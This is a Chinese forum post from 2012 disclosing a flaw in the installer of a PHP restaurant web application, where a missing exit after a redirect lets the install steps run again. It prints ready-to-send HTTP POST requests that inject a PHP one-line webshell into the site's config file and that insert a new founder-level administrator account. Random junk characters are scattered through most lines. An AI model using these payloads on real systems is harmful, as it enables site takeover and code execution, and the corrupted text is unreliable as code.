问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。0 i3 V$ v% r8 }! }! T
! T \! `, N6 A. B: i3 P% p
<?php3 l* q# V2 \4 q5 V
if(file_exists("../install.lock"))9 t' q9 q) x$ ^; M5 ^$ Y% K7 `2 C
{
+ K# _. P$ U1 L header("Location: ../");//没有退出
; m! W7 B8 A4 f' ?9 q$ K$ M+ R: a/ Q; ^}
% K7 c7 s" E# X! q7 v : h. |7 e$ ^' ^& Z$ Z# g
//echo 'tst';exit;: F8 ^$ d8 t C0 k
require_once("init.php");7 E9 z2 j9 x" ]8 J1 p
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
- e: n0 r4 J# U( I* t4 Z{
- T' [ r0 r: I8 a0 {/ z1 \可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。" K) A6 \# y0 P1 P( p9 W' q" i
8 k* S+ i% ~$ F/ G5 J- e5 `
1、getshell(很危险)& Q+ e8 }- u; l# d1 z
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)( p# y u- {, _, Z6 Q
{3 J5 W, l @5 r0 Y- |
$smarty->assign("step",1);, }- f4 N9 \* {6 f
$smarty->display("index.html");
& ^9 ~5 \6 o9 A8 \+ C}elseif($_REQUEST['step']==2), M F/ C' _4 d- u" s7 H( L9 Z" o) V
{4 ]( W' o6 t/ q9 V
$mysql_host=trim($_POST['mysql_host']);( k) u# [/ I# z7 n% }) _3 J$ X
$mysql_user=trim($_POST['mysql_user']);
, Z5 v1 ?, O: G4 |$ x$ G $mysql_pwd=trim($_POST['mysql_pwd']);; U, H) [) @% z- i5 t! P1 `
$mysql_db=trim($_POST['mysql_db']);
1 g& R0 e( `0 d: T9 k) S" n $tblpre=trim($_POST['tblpre']);
7 m0 f: M0 M. Z( u, b) | ] $domain==trim($_POST['domain']);* v) }& i7 w% z
$str="<?php \r\n";% L, T. X9 W& H1 Q
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
6 i! J& t1 i9 V $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
6 Z& m$ W2 W( ?: P) q $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";; v- u" Q0 O8 a9 ]& l/ Z+ p: `
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";! S& U7 Z% S# r' I
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
5 R+ U+ E, s5 p* ?9 A4 T4 z $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";6 K3 Y/ `# k3 k. o% W+ v5 a: T: R
$str.='define("DOMAIN","'.$domain.'");'."\r\n";% c' H- P6 X% ~
$str.='define("SKINS","default");'."\r\n";
& x, N/ }* y% a+ P& O $str.='?>';, c! P: k1 s5 W4 F; Y- E
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
9 k& W# Q% [1 ]5 P" G# y% x上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
. y$ f* I ?9 }4 w4 T3 EPOST /canting/install/index.php?m=index&step=2 HTTP/1.1 @$ n7 |5 u- q* B9 C2 l
Host: 192.168.80.129
0 @/ Z& u5 ^. Y4 I3 g4 d8 ~" vUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0, h; v* s$ }0 R9 S6 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
0 X+ ^( r- s7 i7 m2 R; y4 cAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
) Z" _3 G" L. Y" DAccept-Encoding: gzip, deflate
/ s2 y( ]! ?1 }Referer: http://192.168.80.129/canting/install/index.php?step=1
0 l1 D, e8 c2 t: TCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc428 n5 {7 Q! n" L( r# R5 u" p- e+ A
Content-Type: application/x-www-form-urlencoded
?3 C/ G3 L6 z, u* f& yContent-Length: 126
( G$ \- S; L R# M5 S( V, ] ! \( x6 f Y& [$ M) X
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
; Z; {$ |9 {5 }4 i4 ?但是这个方法很危险,将导致网站无法运行。/ U) q# I, Q$ d2 M5 y3 q# v* K
, s+ M& u1 [! ~3 }$ o3 f' N" C2、直接添加管理员
3 d- k( w& {7 o' f) l& Q1 `3 c
7 R( j9 s5 I3 i1 |2 _9 kelseif($_REQUEST['step']==5)2 w! w- b- r @+ N" R h
{- ~+ J8 @1 h- P% d* ~
if($_POST)* _- `$ |8 t8 P Y
{ require_once("../config/config.inc.php");" y5 |8 n/ `# q9 m& p' K
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);7 t, c, b* i8 Z) a0 d; R( @$ r% u
mysql_select_db(MYSQL_DB,$link);" A4 N- k }$ @* B0 x- n) c c
mysql_query("SET NAMES ".MYSQL_CHARSET );
) j% X! P9 r. @; a/ r% ]* C a mysql_query("SET sql_mode=''");
8 N8 K: d4 ^, r) |
p k; |# Q$ y; ^# i $adminname=trim($_POST['adminname']);3 l0 W0 l3 O# C
$pwd1=trim($_POST['pwd1']);
6 Q% x! o/ W8 r8 r7 P $pwd2=trim($_POST['pwd2']);+ r9 k, `- Z1 a) ]% }+ B7 C
if(empty($adminname))7 g" L7 v$ }( x
{
& x, c7 l) u% ]! W& S' U- f# F! Z
echo "<script>alert('管理员不能为空');history.go(-1);</script>";5 v/ Y5 N# j. X+ A5 C5 ^" `
exit();& I' `8 n/ P+ v
}0 O" z7 ^5 l- E6 A% Z
if(($pwd1!=$pwd2) or empty($pwd1))
$ l0 f+ v1 T1 h* ^1 U7 a; w) @ {
9 J4 J5 H% a d' u% M* f echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出( t3 y" `7 b" o& X& _( X
}8 N4 k- K I+ u2 L; \! R6 S1 g
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员: i/ K. x' e! f1 d
}$ V- E& k1 D6 h! e) g, g
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:, F" d# f4 } |) f+ M: b
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
9 E! L" _/ }0 `Host: 192.168.80.129
0 b6 f. F+ ?; E/ s4 DUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0* |2 o+ Y1 ~% l3 @" Q1 ^; n g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. M1 E# [' G9 V( S- v
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 R$ M" e* Y: u# R, V' `
Accept-Encoding: gzip, deflate
$ C% [* O e6 F t; d. QReferer: http://www.2cto.com /canting/install/index.php?step=1
# o* A2 s% P, I# w8 O- DCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42& `8 ]+ L5 z6 O4 r* h& S4 R9 Q
Content-Type: application/x-www-form-urlencoded3 r' l" y" @! i7 P1 [3 o5 s/ E; X
Content-Length: 46
1 R4 W3 r' Z7 Z9 o. m! Z2 p7 g ; y l- ~$ I( z3 P; N
adminname=qingshen&pwd1=qingshen&pwd2=qingshen& P. H1 |5 Y( B9 H5 a9 }
|
发表于 2012-12-4 11:13:44
收藏
支持
反对